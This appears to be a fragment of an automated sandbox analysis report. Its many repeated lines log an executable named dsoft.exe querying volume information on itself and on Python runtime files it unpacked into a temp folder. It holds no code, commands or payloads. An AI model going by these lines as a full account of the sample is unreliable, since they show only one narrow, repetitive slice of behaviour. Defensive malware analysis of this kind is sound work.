Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\libffi-7.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\python310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\VCRUNTIME140_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_asyncio.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_cffi_backend.cp310-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_decimal.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_multiprocessing.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_uuid.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pywintypes310.dll VolumeInformation	Jump to behavior
